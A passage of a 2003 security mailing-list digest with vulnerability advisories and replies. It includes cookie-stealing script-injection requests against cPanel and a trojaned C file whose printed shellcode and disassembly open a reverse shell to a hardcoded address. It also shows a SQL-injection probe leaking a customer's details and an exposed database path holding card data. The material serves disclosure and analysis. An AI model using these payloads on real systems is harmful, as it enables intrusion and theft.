</pre> > > ... > > > > The following request will present a pop-up screen with the cookies > > that are currently associated with the domain: > > > > GET /<script>alert(document.cookie);</script> HTTP/1.0 > > Host: www.site.com > > > > > > --[ Note > > > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) > > presented the > > latest requests as HTML links, thus the malicious payload must terminate > > the <a> > > tag before opening a new one. For example: > > > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 > > Host: www.site.com > > > > --[ Solution > > > > According to the vendor, the problem was fixed in version 7.0, which can be > > downloaded at: http://www.cpanel.net/downloads.htm > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > --__--__-- > > > > Message: 7 > > From: "Dave Korn" <davek_throwaway@...mail.com> > > To: full-disclosure@...ts.netsys.com > > Subject: Re: [Full-Disclosure] tripbid secure codes > > Date: Sun, 06 Jul 2003 12:23:01 +0000 > > > > > > ----- Original Message ----- > > From: <auto94042@...hmail.com> > > To: <full-disclosure@...ts.netsys.com> > > Sent: Friday, June 27, 2003 6:25 AM > > Subject: [Full-Disclosure] tripbid secure codes > > > > > > >i post the thing to the vuln dev some days ago and get quite a big > > respnose. > > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but > > >some folks want me to look at the code they make, specially a 'hello- > > >world.c' progie -> " holo, can you check my hello-world.c for strcpy > > >?? securecode do the trick " <- paraphase the msg, i rm -rf / it since > > >it make me anger and stress it ! > > > > > >i am willing to try the secure code since the grep 'strcpy' is losing > > >his thrills so i trick around with : > > >[user@...alhost]$ ./securecode -s hello-world.c > > > > > > Never ever EVER run an insecure program over arbitrary data you receive from > > the net without checking it for safety first..... Let's look at this > > hello-world.c before we run anything on it.... > > > > > > Z:\sploits-misc\targzip>type hello-world.c > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!? > > ?!? ?!? ?!? ?!? ?!? ?!? > > ?!??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Q??Q??Q??Q?????f????1?1?QQh?b??fh????fQ????SWR?????f??1?9?t?1?????1???????1?????????1?????????1?1?Phn/shh//bi??PS??????1????? > > > > > > Heh. Boy, did j00 get hax0red! Here's what's actually in that file: > > > > $0000 - $00ff: 'A' x 256 > > $0100 - $011f: DWORD $bffff321 x 8 > > $0120 - $0378 $90 = NOP x 600 > > $0378 - $03fa: Binary shellcode > > $03fb - $03fc: CR, LF > > <EOF> > > > > In other words, it's one very long line. Looks to me like the securecode > > program reads each line of the .c file into a buffer that's only 256 bytes > > long; this exploit fills it with 'A', then overwrites the return address on > > the stack with a pointer into the NOP slide. Here's a disassembly of the > > shellcode: note that offset 0 in this disassembly is offset $0370 in the > > file. Sorry for not commenting this, but I don't speak linux asm; however I > > can see a whole bunch of syscalls going on in there; the values in eax > > should tell you whether anything nastier than a few mkdirs was done to > > you... > > > > Z:\sploits-misc\targzip>objdump -D --target=binary > > hello-world2.bin --architectu > > re=i386 > > > > hello-world2.bin: file format binary > > > > objdump: hello-world2.bin: no symbols > > Disassembly of section .data: > > > > 00000000 <.data>: > > 0: 90 nop > > 1: 90 nop > > 2: 90 nop > > 3: 90 nop > > 4: 90 nop > > 5: 90 nop > > 6: 90 nop > > 7: 90 nop > > 8: 90 nop > > 9: 31 c0 xor %eax,%eax > > b: 31 db xor %ebx,%ebx > > d: 31 c9 xor %ecx,%ecx > > f: 51 push %ecx > > 10: b1 06 mov $0x6,%cl > > 12: 51 push %ecx > > 13: b1 01 mov $0x1,%cl > > 15: 51 push %ecx > > 16: b1 02 mov $0x2,%cl > > 18: 51 push %ecx > > 19: 89 e1 mov %esp,%ecx > > 1b: b3 01 mov $0x1,%bl > > 1d: b0 66 mov $0x66,%al > > 1f: cd 80 int $0x80 > > 21: 89 c2 mov %eax,%edx > > 23: 31 c0 xor %eax,%eax > > 25: 31 c9 xor %ecx,%ecx > > 27: 51 push %ecx > > 28: 51 push %ecx > > 29: 68 d4 62 f7 cc push $0xccf762d4 > > 2e: 66 68 b0 ef pushw $0xefb0 > > 32: b1 02 mov $0x2,%cl > > 34: 66 51 push %cx > > 36: 89 e7 mov %esp,%edi > > 38: b3 10 mov $0x10,%bl > > 3a: 53 push %ebx > > 3b: 57 push %edi > > 3c: 52 push %edx > > 3d: 89 e1 mov %esp,%ecx > > 3f: b3 03 mov $0x3,%bl > > 41: b0 66 mov $0x66,%al > > 43: cd 80 int $0x80 > > 45: 31 c9 xor %ecx,%ecx > > 47: 39 c1 cmp %eax,%ecx > > 49: 74 06 je 0x51 > > 4b: 31 c0 xor %eax,%eax > > 4d: b0 01 mov $0x1,%al > > 4f: cd 80 int $0x80 > > 51: 31 c0 xor %eax,%eax > > 53: b0 3f mov $0x3f,%al > > 55: 89 d3 mov %edx,%ebx > > 57: cd 80 int $0x80 > > 59: 31 c0 xor %eax,%eax > > 5b: b0 3f mov $0x3f,%al > > 5d: 89 d3 mov %edx,%ebx > > 5f: b1 01 mov $0x1,%cl > > 61: cd 80 int $0x80 > > 63: 31 c0 xor %eax,%eax > > 65: b0 3f mov $0x3f,%al > > 67: 89 d3 mov %edx,%ebx > > 69: b1 02 mov $0x2,%cl > > 6b: cd 80 int $0x80 > > 6d: 31 c0 xor %eax,%eax > > 6f: 31 d2 xor %edx,%edx > > 71: 50 push %eax > > 72: 68 6e 2f 73 68 push $0x68732f6e > > 77: 68 2f 2f 62 69 push $0x69622f2f > > 7c: 89 e3 mov %esp,%ebx > > 7e: 50 push %eax > > 7f: 53 push %ebx > > 80: 89 e1 mov %esp,%ecx > > 82: b0 0b mov $0xb,%al > > 84: cd 80 int $0x80 > > 86: 31 c0 xor %eax,%eax > > 88: b0 01 mov $0x1,%al > > 8a: cd 80 int $0x80 > > 8c: 0d .byte 0xd > > 8d: 0a .byte 0xa > > > > > > > > DaveK > > > > _________________________________________________________________ > > Sign-up for a FREE BT Broadband connection today! > > http://www.msn.co.uk/specials/btbroadband > > > > > > --__--__-- > > > > Message: 8 > > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT) > > From: "Larry W. Cashdollar" <lwc@...id.ath.cx> > > To: <full-disclosure@...ts.netsys.com> > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file > > can be downloaded remotely > > > > > > > > 949 is a legit zip code in cali. > > > > > > On Sat, 5 Jul 2003, KF wrote: > > > > > Was that legit California data? I am sure than making someone have a > > > nice weekend you just made multiple someones have a shitty month ahead > > > of them... > > > http://www.theregister.co.uk/content/55/31509.html > > > > > > -KF > > > > > > gyrniff wrote: > > > > > > >URL: > > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > > >Change the name Paul to Paul' > > > > > > > >Microsoft OLE DB Provider for ODBC Drivers > > > > error '80040e14' > > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > > > > > > >have a nice weekend ;-) > > > > > > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > > > > > > > > > >>ProductCart database file can be downloaded remotely > > > >>================================================= > > > >> > > > >>PROGRAM: ProductCart > > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/ > > > >>VULNERABLE VERSIONS: 1.0 to 2.0 > > > >>RISK: High > > > >> > > > >> > > > >>DESCRIPTION > > > >>================================================= > > > >> > > > >>ProductCart? is an ASP shopping cart that combines sophisticated > > > >>ecommerce features with time-saving store management tools and remarkable > > > >>ease of use. It is widely used by many e-commerce sites. > > > >> > > > >>DETAILS > > > >>================================================= > > > >> > > > >>In the default installation, product cart database file is located at > > > >>/productcart/database/EIPC.mdb which can be accessed easily > > > >>by any remote attackers. > > > >> > > > >>Sample: http://victimhost/productcart/database/EIPC.mdb > > > >> > > > >>The database file includes the store administration password as well as > > > >>customer's info (including credit card info). > > > >> > > > >> > > > >> WORKAROUND > > > >>================================================= > > > >> > > > >>Rename the database file, put it in a protected directory. > > > >> > > > >> > > > >>CREDITS > > > >>================================================= > > > >> > > > >>Discovered by Tri Huynh from Sentry Union > > > >> > > > >> > > > >>DISLAIMER > > > >>================================================= > > > >> > > > >>The information within this paper may change without notice. Use of > > > >>this information constitutes acceptance for use in an AS IS condition. > > > >>There are NO warranties with regard to this information. In no event > > > >>shall the author be liable for any damages whatsoever arising out of > > > >>or in connection with the use or spread of this information. Any use > > > >>of this information is at the user's own risk. > > > >> > > > >> > > > >>FEEDBACK > > > >>================================================= > > > >> > > > >>Please send suggestions, updates, and comments to: trihuynh@...up.com > > > >> > > > >> > > > > > > > >_______________________________________________ > > > >Full-Disclosure - We believe in it. > > > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > > > > > > > > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > --__--__-- > > > > Message: 9 > > From: "Kristian Hermansen" <this_is_kris@...mail.com> > > To: <full-disclosure@...ts.netsys.com> > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again ) > > Date: Tue, 1 Jul 2003 22:49:59 -0400 > > > > Yes, programmers should be trained to write better code...but it is more > > profitiable to allow sloppy code and a simple fix later (behind the scenes > > with vendor notification). This is MS point-of-view. This is why they want > > vendor notification, rather than public notification. Again, I say let the > > 0-days fly. > > > > Did you know that certain US government agencies have teams that their only > > job is to break software? This has been going on since the 1970's. It > > helps to produce secure code in mission critical applications that the > > military needs. I am not saying that MS needs to be SO drastic...but a > > small team for their MOST popular products would sure be wise to start with. > > Why not hire fucking intern teenagers from russia to "Crash Test" their > > development projects (facetious)? Would it be so difficult/expensive to > > hire some of the main companies that are breaking your software??? > > > > Kris Hermansen > > > > ----- Original Message ----- > > From: "Schmehl, Paul L" <pauls@...allas.edu> > > To: <full-disclosure@...ts.netsys.com> > > Sent: Tuesday, July 01, 2003 6:58 PM > > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again ) > > > > > > > > -----Original Message----- > > > > From: Kristian Hermansen [mailto:this_is_kris@...mail.com] > > > > Sent: Tuesday, July 01, 2003 3:09 PM > > > > To: full-disclosure@...ts.netsys.com > > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again ) > > > > > > > > > > > > I agree. It is not our problem. The reason is this. > > > > Microsoft would like to reduce costs. Fixing bugs in > > > > products costs money, and 0-day bugs need immediate fixes > > > > which slow down MS total output ability. They would like to > > > > see everyone reporting to the vendor first because this saves > > > > them money!!! In this respect, this also allows them to go on > > > > writing sloppy code in order to save a few bucks on every > > > > product, thus reducing their overhead. I don't want sloppy > > > > code. Let the 0-days fly....maybe MS will start doing > > > > extensive testing to their products before they release it > > > > for sale to millions of customers. I thought .NET was > > > > supposed to fix all this ;-P > > > > > > That's too funny. Microsoft ran a "buffer overflow finder" against the > > > codebase for XP, and the VP in charge announced publicly that they had > > > "eliminated buffer overflows in XP". Within thirty days, eEye announced > > > the UPnP vulnerability in SSDP, which is the single most devastating > > > hole ever found in MS products. (You can compromise an entire network > > > of XP machines with one attack, simultaneously.) > > > > > > You don't fix code by extensive testing. You fix it by teaching how to > > > write secure code to begin with *and* by ongoing, consistent audits done > > > before code is released. (OpenBSD has been doing this for years, and > > > look at the results.) > > > > > > Paul Schmehl (pauls@...allas.edu) > > > Adjunct Information Security Officer > > > The University of Texas at Dallas > > > AVIEN Founding Member > > > http://www.utdallas.edu/~pauls/ > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > --__--__-- > > > > _______________________________________________ > > Full-Disclosure mailing list > > Full-Disclosure@...ts.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > End of Full-Disclosure Digest > -- > Markus Nielsen <intercool@...magnet.com> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists